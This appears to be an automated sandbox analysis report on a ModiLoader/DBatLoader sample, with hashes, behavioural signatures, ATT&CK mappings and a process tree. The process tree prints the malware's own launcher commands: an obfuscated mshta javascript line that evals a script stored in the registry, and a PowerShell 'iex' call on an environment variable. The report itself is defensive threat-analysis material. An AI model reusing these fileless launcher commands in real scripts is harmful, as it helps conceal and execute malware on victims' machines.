Analysis

  • max time kernel
    91s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220901-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220901-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-10-2022 18:27

General

  • Target

    c6b2d57e8ce70dae5585a096e2e17619.exe

  • Size

    524KB

  • MD5

    c6b2d57e8ce70dae5585a096e2e17619

  • SHA1

    a61e6e668205f7fbdd2bc03dbd9e1ae85c9af241

  • SHA256

    62184398a535b5aa0ccd7457470cdb9ab4fc22aaaed11a19cef2ddba8d75eaf5

  • SHA512

    91c8895086107b72f48988ed807518630529646df26c094e4c4251ef58dc7a099bd59760c92f5ebaf9359d8e5196a4bfd1e3ced0dd8cb0634d0c27bbb8036f23

  • SSDEEP

    6144:PHoex1r1iKzGkYj+eNnHNvdySJbsSt+c4yR83tahDYz2aUIsR3GiXMj9KpJzLIW:/bL6k2+Ak6+hyy3E0bUBR3G2LIW

Score
10/10

Malware Config

Signatures

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • ModiLoader Second Stage 5 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c6b2d57e8ce70dae5585a096e2e17619.exe
    "C:\Users\Admin\AppData\Local\Temp\c6b2d57e8ce70dae5585a096e2e17619.exe"
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:1484
  • C:\Windows\system32\mshta.exe
    "C:\Windows\system32\mshta.exe" javascript:lrhEJ1lD5="d";ux14=new%20ActiveXObject("WScript.Shell");B6FjCb7l="lOQ";ee9Eu=ux14.RegRead("HKCU\\software\\3PasnEEMVZ\\Lyy1bGbGSq");RGT05qc="Qb";eval(ee9Eu);BIJjX6d="ww0";
    1⤵
    • Process spawned unexpected child process
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:908
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:cycd
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2628

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1484-133-0x0000000000400000-0x000000000048C1E8-memory.dmp
    Filesize

    560KB

  • memory/1484-132-0x0000000000400000-0x000000000043C000-memory.dmp
    Filesize

    240KB

  • memory/1484-134-0x0000000000400000-0x000000000048C1E8-memory.dmp
    Filesize

    560KB

  • memory/1484-135-0x0000000002DD0000-0x0000000002EAC000-memory.dmp
    Filesize

    880KB

  • memory/1484-146-0x0000000002DD0000-0x0000000002EAC000-memory.dmp
    Filesize

    880KB

  • memory/2628-139-0x0000000005240000-0x0000000005868000-memory.dmp
    Filesize

    6.2MB

  • memory/2628-138-0x00000000027B0000-0x00000000027E6000-memory.dmp
    Filesize

    216KB

  • memory/2628-140-0x0000000005140000-0x0000000005162000-memory.dmp
    Filesize

    136KB

  • memory/2628-141-0x0000000005920000-0x0000000005986000-memory.dmp
    Filesize

    408KB

  • memory/2628-142-0x0000000005990000-0x00000000059F6000-memory.dmp
    Filesize

    408KB

  • memory/2628-143-0x0000000005EF0000-0x0000000005F0E000-memory.dmp
    Filesize

    120KB

  • memory/2628-144-0x0000000007730000-0x0000000007DAA000-memory.dmp
    Filesize

    6.5MB

  • memory/2628-145-0x00000000063E0000-0x00000000063FA000-memory.dmp
    Filesize

    104KB

  • memory/2628-137-0x0000000000000000-mapping.dmp